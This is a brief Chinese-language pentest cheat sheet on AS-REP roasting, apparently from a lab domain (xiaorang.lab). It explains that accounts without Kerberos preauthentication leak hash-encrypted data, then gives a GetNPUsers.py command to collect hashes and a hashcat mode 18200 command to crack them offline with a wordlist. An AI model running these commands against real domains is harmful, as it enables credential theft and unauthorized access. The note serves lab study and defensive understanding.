Detail
对于域用户,如果设置了选项 “Do not require Kerberos preauthentication”,此时向域控制器发送 AS_REQ 请求,域控不会对 ENC_TIMESTAMP 字段做预认证,直接将使用用户 hash 加密的 session-key 发回来,于是可以通过离线爆破获得用户的明文口令。
Usage
获得用户 hash
python GetNPUsers.py -dc-ip 172.22.60.8 xiaorang.lab/ -usersfile user.txt -format hashcat -outputfile hash.txt使用 hashcat 进行爆破
hashcat -a 0 -m 18200 --force hash.txt rockyou.txt -o result.txt